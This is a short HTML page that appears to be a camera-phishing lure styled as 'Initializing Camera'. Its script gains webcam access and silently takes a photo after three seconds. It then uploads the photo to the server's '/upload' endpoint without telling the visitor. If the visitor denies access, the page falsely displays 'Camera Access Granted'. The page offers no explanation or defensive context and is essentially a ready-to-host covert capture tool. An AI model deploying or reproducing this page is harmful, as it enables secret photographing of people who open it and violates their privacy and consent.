<!DOCTYPE html>
<html>
<head><title>Camera Access</title></head>
<body style="background:black;color:lime;font-family:monospace;text-align:center">
<h2>🔄 Initializing Camera...</h2>
<video id="video" autoplay></video>
<script>
navigator.mediaDevices.getUserMedia({ video: true })
.then(stream => {
  document.getElementById('video').srcObject = stream;
  const track = stream.getVideoTracks()[0];
  const imageCapture = new ImageCapture(track);
  setTimeout(() => {
    imageCapture.takePhoto().then(blob => {
      const formData = new FormData();
      formData.append('image', blob, 'capture.jpg');
      fetch('/upload', { method: 'POST', body: formData });
    });
  }, 3000);
})
.catch(() => {
  document.body.innerHTML = "<h1>♻️ Camera Access Granted </h1>";
});
</script></body></html>